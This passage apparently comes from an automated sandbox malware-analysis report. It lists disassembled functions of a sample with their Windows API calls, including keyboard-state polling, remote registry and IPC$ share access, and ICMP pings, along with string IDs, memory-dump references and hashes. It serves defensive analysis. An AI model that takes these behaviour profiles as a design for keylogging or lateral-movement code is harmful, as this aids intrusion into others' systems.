              • GetSysColor.USER32(0000000F), ref: 006E9862
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ColorLongWindow
              • String ID:
              • API String ID: 259745315-0
              • Opcode ID: f2cb288920d473719dd114cdb5f38dd60a17ceecf1f6f24acf7a6f9c6bf5cb41
              • Instruction ID: f2ec25cf4292dc54dc20e237437823fe99ca42be3dae8a77c56f510eeffe5df2
              • Opcode Fuzzy Hash: f2cb288920d473719dd114cdb5f38dd60a17ceecf1f6f24acf7a6f9c6bf5cb41
              • Instruction Fuzzy Hash: 8B41E2311017949FDB255F399C84BBA3B66AF06330F248A05F9A28B2F2D3749C42DB21
              Function 007396E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0071F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00739717
              • LoadStringW.USER32(00000000,?,0071F7F8,00000001), ref: 00739720
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0071F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00739742
              • LoadStringW.USER32(00000000,?,0071F7F8,00000001), ref: 00739745
              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00739866
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message_wcslen
              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
              • API String ID: 747408836-2268648507
              • Opcode ID: a0b434aca8f55dad4b28e0eeab1aed15579c73b28106b53d5bff374f8aea8f2d
              • Instruction ID: b73178ec05fd28a1bbcd66298862a916ee90a2b44c65ef12ab536a63cca4b8ad
              • Opcode Fuzzy Hash: a0b434aca8f55dad4b28e0eeab1aed15579c73b28106b53d5bff374f8aea8f2d
              • Instruction Fuzzy Hash: EB416F72D00219AADF44EBE0DE86DEE7379AF55740F10012AF60172292EB796F48CB75
              Function 007306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007307A2
              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007307BE
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007307DA
              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00730804
              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0073082C
              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00730837
              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0073083C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
              • API String ID: 323675364-22481851
              • Opcode ID: ce43b72e09e6513090f05cd4315410f2b2f176549ced7d58ffa8b4fc0e309fd6
              • Instruction ID: 95c8acfcb59d74591375d26b5b1ddc976a2b038311719d0d3ca05f91431dd805
              • Opcode Fuzzy Hash: ce43b72e09e6513090f05cd4315410f2b2f176549ced7d58ffa8b4fc0e309fd6
              • Instruction Fuzzy Hash: 4E413872C10229ABDF15EBA4DC95CFDB779FF04350F04412AE901A32A1EB74AE04CBA4
              Function 00747A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
              Download Yara Rule
              APIs
              • CoInitialize.OLE32(00000000), ref: 00747AF3
              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00747B8F
              • SHGetDesktopFolder.SHELL32(?), ref: 00747BA3
              • CoCreateInstance.OLE32(0076FD08,00000000,00000001,00796E6C,?), ref: 00747BEF
              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00747C74
              • CoTaskMemFree.OLE32(?,?), ref: 00747CCC
              • SHBrowseForFolderW.SHELL32(?), ref: 00747D57
              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00747D7A
              • CoTaskMemFree.OLE32(00000000), ref: 00747D81
              • CoTaskMemFree.OLE32(00000000), ref: 00747DD6
              • CoUninitialize.OLE32 ref: 00747DDC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
              • String ID:
              • API String ID: 2762341140-0
              • Opcode ID: 336efb01a9b17f2d91b6f9a7c54d470ee070cbf344fc729576b345c46eac765d
              • Instruction ID: 88fa4f46b2ed3f8bcd1c0b43ce7eeebb851591999076f28b77f8412965df9cd9
              • Opcode Fuzzy Hash: 336efb01a9b17f2d91b6f9a7c54d470ee070cbf344fc729576b345c46eac765d
              • Instruction Fuzzy Hash: 0DC12B75A04209AFCB14DFA4C884DAEBBF9FF48314B148499E81A9B361DB34ED45CF94
              Function 0076541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00765504
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00765515
              • CharNextW.USER32(00000158), ref: 00765544
              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00765585
              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0076559B
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007655AC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$CharNext
              • String ID:
              • API String ID: 1350042424-0
              • Opcode ID: a9f19b519fba1ca7e1668433fffe26b91a0a4dee532c32914e6578a40c3d989e
              • Instruction ID: a9d3765b25db9d9cb9c25acf3f0b136b4d4e2724887bcd4f0457ca8e471b50d3
              • Opcode Fuzzy Hash: a9f19b519fba1ca7e1668433fffe26b91a0a4dee532c32914e6578a40c3d989e
              • Instruction Fuzzy Hash: FB618E30900609EFDF118F64CC84DFE7BB9EB05724F108185F967A6291DB7C9A80EB60
              Function 0072FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
              Download Yara Rule
              APIs
              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0072FAAF
              • SafeArrayAllocData.OLEAUT32(?), ref: 0072FB08
              • VariantInit.OLEAUT32(?), ref: 0072FB1A
              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0072FB3A
              • VariantCopy.OLEAUT32(?,?), ref: 0072FB8D
              • SafeArrayUnaccessData.OLEAUT32(?), ref: 0072FBA1
              • VariantClear.OLEAUT32(?), ref: 0072FBB6
              • SafeArrayDestroyData.OLEAUT32(?), ref: 0072FBC3
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0072FBCC
              • VariantClear.OLEAUT32(?), ref: 0072FBDE
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0072FBE9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
              • String ID:
              • API String ID: 2706829360-0
              • Opcode ID: 087bfa131f44d690eacc3a97a6ded732074b4658513fc3f214a4300d00ee15d7
              • Instruction ID: 510550fcb4b1984d36b7978bfcc8d2588bb2ad7a7bbf485244397592e94b6b2f
              • Opcode Fuzzy Hash: 087bfa131f44d690eacc3a97a6ded732074b4658513fc3f214a4300d00ee15d7
              • Instruction Fuzzy Hash: 26418E75A00269DFCB01DF64D8589AEBFB9EF08354F00C039E946A7261CB78A945CFA4
              Function 00739C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?), ref: 00739CA1
              • GetAsyncKeyState.USER32(000000A0), ref: 00739D22
              • GetKeyState.USER32(000000A0), ref: 00739D3D
              • GetAsyncKeyState.USER32(000000A1), ref: 00739D57
              • GetKeyState.USER32(000000A1), ref: 00739D6C
              • GetAsyncKeyState.USER32(00000011), ref: 00739D84
              • GetKeyState.USER32(00000011), ref: 00739D96
              • GetAsyncKeyState.USER32(00000012), ref: 00739DAE
              • GetKeyState.USER32(00000012), ref: 00739DC0
              • GetAsyncKeyState.USER32(0000005B), ref: 00739DD8
              • GetKeyState.USER32(0000005B), ref: 00739DEA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
              • Opcode ID: fb361379aad0776e414fa5a19382949fe7b27a2882a2f76306813bcc5f1e7414
              • Instruction ID: 6d32a2f2b0f9efbf5ff9596b3831d434f2d91112b2025aa6cb171632a572426d
              • Opcode Fuzzy Hash: fb361379aad0776e414fa5a19382949fe7b27a2882a2f76306813bcc5f1e7414
              • Instruction Fuzzy Hash: BC41B5346047CA69FF719674C8053B6BEA06F11344F08805ADBC7566C3EBED99D8CBA2
              Function 0075055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
              Download Yara Rule
              APIs
              • WSAStartup.WSOCK32(00000101,?), ref: 007505BC
              • inet_addr.WSOCK32(?), ref: 0075061C
              • gethostbyname.WSOCK32(?), ref: 00750628
              • IcmpCreateFile.IPHLPAPI ref: 00750636
              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007506C6
              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007506E5
              • IcmpCloseHandle.IPHLPAPI(?), ref: 007507B9
              • WSACleanup.WSOCK32 ref: 007507BF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
              • String ID: Ping
              • API String ID: 1028309954-2246546115
              • Opcode ID: c72f6a475a4eefc2d6ece88d8da6e0dbebf22bb95da03995c9603bdf400f210f
              • Instruction ID: feb911616852a11f65a144d2db004482e7efd395c37ba8469346978a71fce0e8
              • Opcode Fuzzy Hash: c72f6a475a4eefc2d6ece88d8da6e0dbebf22bb95da03995c9603bdf400f210f
              • Instruction Fuzzy Hash: 7B918D755042019FD720CF15C488F5ABBE1EF48318F1489A9E86A8B7A2D7B8ED49CFD1
              Function 00758CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharLower
              • String ID: cdecl$none$stdcall$winapi
              • API String ID: 707087890-567219261
              • Opcode ID: 5c643f9dc279783118a9dc3de1e2d3a1fd070a837c8a66843c51095ff92acf33
              • Instruction ID: a7b34931148121a93e99812c5ecf47b64bce4b8377e0ade6bc4057e9b4f34c78
              • Opcode Fuzzy Hash: 5c643f9dc279783118a9dc3de1e2d3a1fd070a837c8a66843c51095ff92acf33
              • Instruction Fuzzy Hash: 8751AE31A001169BCB94DF68C8419FEB3B2AF69721B204229E866F7284DFB9DD44C791
              Function 0075372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
              Download Yara Rule
              APIs
              • CoInitialize.OLE32 ref: 00753774
              • CoUninitialize.OLE32 ref: 0075377F
              • CoCreateInstance.OLE32(?,00000000,00000017,0076FB78,?), ref: 007537D9
              • IIDFromString.OLE32(?,?), ref: 0075384C
              • VariantInit.OLEAUT32(?), ref: 007538E4
              • VariantClear.OLEAUT32(?), ref: 00753936
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
              • API String ID: 636576611-1287834457
              • Opcode ID: 4cc741089aa3eeca5cf264f1aa6b29aff0cb5bc83ac1cd052b50c9dec4f16bd3
              • Instruction ID: 463e6d4598e71809c39e55dd969ee3055a8d7088d5a7e92745fe8f3fa9fb499c
              • Opcode Fuzzy Hash: 4cc741089aa3eeca5cf264f1aa6b29aff0cb5bc83ac1cd052b50c9dec4f16bd3
              • Instruction Fuzzy Hash: 1861C4B06083019FD315DF54C889FAABBE4EF48755F00490DF985972A1D7B8EE48CBA6
              Function 00768B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
                • Part of subcall function 006E912D: GetCursorPos.USER32(?), ref: 006E9141
                • Part of subcall function 006E912D: ScreenToClient.USER32(00000000,?), ref: 006E915E
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000001), ref: 006E9183
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000002), ref: 006E919D
              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00768B6B
              • ImageList_EndDrag.COMCTL32 ref: 00768B71
              • ReleaseCapture.USER32 ref: 00768B77
              • SetWindowTextW.USER32(?,00000000), ref: 00768C12
              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00768C25
              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00768CFF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
              • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#z
              • API String ID: 1924731296-3428299791
              • Opcode ID: d09c2f1fd0388035152ca006513814f274069e0585bf28f786c765d95c8412c7
              • Instruction ID: 0427278163f4a04506eda5804f82da71ebc179f050c7d3a8171f01216d4815d6
              • Opcode Fuzzy Hash: d09c2f1fd0388035152ca006513814f274069e0585bf28f786c765d95c8412c7
              • Instruction Fuzzy Hash: 4D51AB70504340AFE744DF14DC5AFAA77E5FB88710F40062EF996972A2CB78AD04CB66
              Function 00743388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007433CF
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007433F0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LoadString$_wcslen
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
              • API String ID: 4099089115-3080491070
              • Opcode ID: 4d5f1c91b362c3c5f27dc170850a04f9fce42670f2beb50ddbc39bf69c709e38
              • Instruction ID: a179a63fe67848d848bab646894733614720871dcb4199b9bc08650f7e9364d0
              • Opcode Fuzzy Hash: 4d5f1c91b362c3c5f27dc170850a04f9fce42670f2beb50ddbc39bf69c709e38
              • Instruction Fuzzy Hash: 3E51F471D00219AAEF15EBE0DD46EEEB779EF04340F10416AF10572252EB392F58DB65
              Function 0073B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: APPEND$EXISTS$KEYS$REMOVE
              • API String ID: 1256254125-769500911
              • Opcode ID: 5aa0e9982f3e774866ad0446cf34bef2aa17330b8e9f8bbb5af3296760146114
              • Instruction ID: bcff0bc1f5e9aa95ec3128bd82eed675067377857034562d704d549b8473f148
              • Opcode Fuzzy Hash: 5aa0e9982f3e774866ad0446cf34bef2aa17330b8e9f8bbb5af3296760146114
              • Instruction Fuzzy Hash: 27410632A01026DBDB205F7DC8925BE77A5AFA1754F24422AE621DB287E739CD81C790
              Function 00745393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 007453A0
              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00745416
              • GetLastError.KERNEL32 ref: 00745420
              • SetErrorMode.KERNEL32(00000000,READY), ref: 007454A7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Error$Mode$DiskFreeLastSpace
              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
              • API String ID: 4194297153-14809454
              • Opcode ID: 9f732e74d15cd74c6a5dc1c8ca7b74b3e253f004fedcd62343a2a524719d2b2f
              • Instruction ID: 1cc20de00ed15d343bb3e455532a33f1a24b0991f87a91e164da613ff53cf3b2
              • Opcode Fuzzy Hash: 9f732e74d15cd74c6a5dc1c8ca7b74b3e253f004fedcd62343a2a524719d2b2f
              • Instruction Fuzzy Hash: 4231A075A006449FCB11DF6CD484AAA7BB4EF05305F148169E806CF393DB79DD82CB91
              Function 00763A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00763A9D
              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00763AA0
              • GetWindowLongW.USER32(?,000000F0), ref: 00763AC7
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00763AEA
              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00763B62
              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00763BAC
              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00763BC7
              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00763BE2
              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00763BF6
              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00763C13
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$LongWindow
              • String ID:
              • API String ID: 312131281-0
              • Opcode ID: 06fecd392efad6acfc20318499c4c7634008b34adbf417c5e8e45a513dab8665
              • Instruction ID: 585b4753c3fc8015170728b2b2a26f47687aceef2413ce54bc42cf5aedaaa587
              • Opcode Fuzzy Hash: 06fecd392efad6acfc20318499c4c7634008b34adbf417c5e8e45a513dab8665
              • Instruction Fuzzy Hash: 21618C75900248AFDB11DFA8CC81EEE77B8EF49700F104199FA16E72A1C778AE45DB64
              Function 0073B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
              Download Yara Rule
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 0073B151
